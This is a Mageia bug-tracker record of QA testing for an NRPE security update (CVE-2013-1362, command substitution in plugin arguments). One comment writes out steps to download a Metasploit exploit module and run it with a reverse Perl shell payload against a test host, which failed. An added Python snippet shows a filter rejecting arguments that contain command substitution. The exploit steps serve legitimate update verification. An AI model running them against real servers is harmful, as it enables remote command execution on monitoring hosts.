Bug 9615 - nrpe new security issue CVE-2013-1362
Status: RESOLVED FIXED
Product: Mageia
Classification: Unclassified
Component: Security
Version: 2
Hardware: i586 Linux
Priority: Normal Severity: critical
Target Milestone: ---
Assigned To: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/545985/
Whiteboard: has_procedure mga2-64-ok mga2-32-ok
Keywords: validated_update
Reported: 2013-04-04 18:38 CEST by David Walser
Modified: 2013-05-09 12:36 CEST (History)

Source RPM: nrpe-2.13-6.mga3.src.rpm

Description David Walser 2013-04-04 18:38:46 CEST
OpenSuSE has issued an advisory today (April 4):
http://lists.opensuse.org/opensuse-updates/2013-04/msg00039.html

Mageia 2 is also affected.

Comment 1 David Walser 2013-04-05 14:02:14 CEST
Fixed in Cauldron in nrpe-2.14-1.mga3.
Comment 2 David Walser 2013-04-05 14:51:33 CEST
(In reply to David Walser from comment #1)
> Fixed in Cauldron in nrpe-2.14-1.mga3.

Oops, not quite yet:
http://pkgsubmit.mageia.org/uploads/rejected/cauldron/core/release/20130405115319.guillomovitch.valstar.1188.youri
Comment 3 David Walser 2013-04-05 16:05:39 CEST
nrpe-2.14-1.mga3 uploaded in Cauldron.  Thanks Guillaume.
Comment 4 David Walser 2013-05-02 17:25:17 CEST
This is updated in SVN for Mageia 2 by Daniel Lucio.

We had to remove it from updates_testing because the release tag was wrong, as it should be 1 with no subrel, so that it's not newer than Cauldron.  I fixed the release tag in SVN.

Daniel, if this update is otherwise ready, go ahead and submit it to the build system again and we can assign this to QA.  Thanks.
Comment 5 David Walser 2013-05-02 21:48:26 CEST
Updated package uploaded for Mageia 2.  Thanks Daniel!

Advisory:
========================

Updated nrpe packages fix security vulnerability:

NRPE (the Nagios Remote Plug-In Executor) allows the passing of $() to
plugins/scripts which, if run under bash, will execute that shell command
under a subprocess and pass the output as a parameter to the called script.
Using this, it is possible to get called scripts, such as check_http, to
execute arbitrary commands under the uid that NRPE/nagios is running as
(typically, 'nagios') (CVE-2013-1362).

With this update NRPE will deny remote requests containing a bash command substitution.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362
http://lists.opensuse.org/opensuse-updates/2013-04/msg00039.html
========================

Updated packages in core/updates_testing:
========================
nrpe-2.14-1.mga2
nagios-check_nrpe-2.14-1.mga2

from nrpe-2.14-1.mga2.src.rpm
Comment 6 claire robinson 2013-05-03 19:08:07 CEST
PoC: http://www.youtube.com/watch?v=OBgjp9gheBM

# service nrpe start
Starting nrpe (via systemctl):                              [  OK  ]

# netstat -at | grep nrpe
tcp        0      0 *:nrpe           *:*                     LISTEN

# /usr/lib/nagios/plugins/check_nrpe -H localhost
NRPE v2.12

# tailf /var/log/syslog

Open another terminal tab..

$ git clone https://github.com/bcoles/metasploit-framework.git metasploit

$ wget -O metasploit/modules/exploits/linux/misc/nagios_nrpe_arguments.rb http://packetstormsecurity.com/files/download/121287/nagios_nrpe_arguments.rb.txt

$ cd metasploit/
$ ./msfconsole

at metasploit console..

msf > use exploit/linux/misc/nagios_nrpe_arguments
msf  exploit(nagios_nrpe_arguments) > show options
msf  exploit(nagios_nrpe_arguments) > set RHOST localhost
RHOST => localhost
msf  exploit(nagios_nrpe_arguments) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf  exploit(nagios_nrpe_arguments) > set LHOST localhost
LHOST => localhost
msf  exploit(nagios_nrpe_arguments) > exploit

[*] Started reverse handler on 127.0.0.1:4444
[*] Checking if remote NRPE supports command line arguments
[-] Exploit failed [not-found]: Host does not support plugin command line arguments or is not accepting connections

In syslog in the other terminal tab..

nrpe[18189]: Error: Request contained command arguments, but argument option is not enabled!
nrpe[18189]: Client request was invalid, bailing out...

We're maybe not vulnerable to this, will need to check with 2 hosts rather than both on localhost.
Comment 8 claire robinson 2013-05-03 19:13:17 CEST
Looks like this would have to be set to 1 in /etc/nagios/nrpe.conf

# *** ENABLING THIS OPTION IS A SECURITY RISK! ***
# Read the SECURITY file for information on some of the security implications
# of enabling this variable.
#
# Values: 0=do not allow arguments, 1=allow command arguments

dont_blame_nrpe=0

I'll try to play some more later.
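Added example, not code from NRPE or from anyone in this bug: a Python model of the request policy described by the advisory in comment 5 and the dont_blame_nrpe setting shown in comment 8. The nrpe.cfg text is constructed, and treating backticks as command substitution alongside $( ) is an assumption beyond what the advisory names.

```python
import re

# Constructed nrpe.cfg fragment, modelled on the excerpt quoted in comment 8
# (the warning comment plus the shipped default dont_blame_nrpe=0).
SAMPLE_NRPE_CFG = """\
# *** ENABLING THIS OPTION IS A SECURITY RISK! ***
# Values: 0=do not allow arguments, 1=allow command arguments
dont_blame_nrpe=0
command[check_users]=/usr/lib/nagios/plugins/check_users -w 5 -c 10
command[check_http]=/usr/lib/nagios/plugins/check_http -H $ARG1$
"""

# Substitution syntax bash expands inside a plugin argument. The advisory names
# "$("; the backtick form is included here as an assumption of equivalent risk.
_COMMAND_SUBSTITUTION = re.compile(r"\$\(|`")


def parse_nrpe_cfg(text):
    """Return (dont_blame_nrpe enabled?, {name: command line}) from nrpe.cfg text."""
    allow_args = False
    commands = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if key == "dont_blame_nrpe":
            allow_args = value == "1"
        m = re.fullmatch(r"command\[([^\]]+)\]", key)
        if m:
            commands[m.group(1)] = value
    return allow_args, commands


def evaluate_request(cfg_text, request):
    """Classify a check_nrpe request ("name!arg1!arg2") the way the patched
    daemon is described to behave: arguments are refused outright when
    dont_blame_nrpe=0 (the syslog line in comment 6), and even when they are
    allowed, any argument carrying command substitution is refused."""
    allow_args, commands = parse_nrpe_cfg(cfg_text)
    name, *args = request.split("!")
    if name not in commands:
        return "rejected: unknown command"
    if args and not allow_args:
        return "rejected: arguments not enabled"
    if any(_COMMAND_SUBSTITUTION.search(a) for a in args):
        return "rejected: command substitution in arguments"
    return "accepted"
```

The third outcome is the one this update adds; the second is why the PoC in comment 6 failed against a host still running the shipped default.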
Comment 9 claire robinson 2013-05-03 19:15:15 CEST
Perhaps as we ship with it disabled and this is a direct update rather than patch it is enough to show the service is starting and listening after update.
Comment 10 claire robinson 2013-05-03 19:40:16 CEST
Notice one issue though when stopping/restarting the service..

nrpe[18832]: Caught SIGTERM - shutting down...
nrpe[18832]: Cannot remove pidfile '/var/run/nrpe/nrpe.pid' - check your privileges.
nrpe[18832]: Daemon shutdown
nrpe[19974]: Stopping nrpe: [  OK  ]

# ll /var/run/nrpe/nrpe.pid
-rw-r--r-- 1 root root 6 May  3 18:16 /var/run/nrpe/nrpe.pid

nrpe runs as user/group nagios
Comment 11 claire robinson 2013-05-03 20:20:20 CEST
Tested with two hosts, set to allow commands and to allow connections from each other and both services restarted. I'm not able to reproduce with the PoC; the exploit doesn't show a failure, it just doesn't seem to work.

Just testing to ensure the updated service starts and is listening.

# /usr/lib/nagios/plugins/check_nrpe -H <remote host ip>
NRPE v2.14

Checked from 64bit local to 32bit remote and vice versa so confirmed the service is listening and talking.

The permissions issue doesn't prevent the service from stopping but it does leave a pid file behind. The pid file doesn't prevent the service from restarting either, I'll create a new bug for it.

Created bug 9972 for the pid file issue

Validating this one

SRPM & Advisory in comment 5

Could sysadmin please push from core/updates_testing to core/updates

Thanks!
Comment 12 Thomas Backlund 2013-05-09 12:36:25 CEST
Update pushed:
https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0139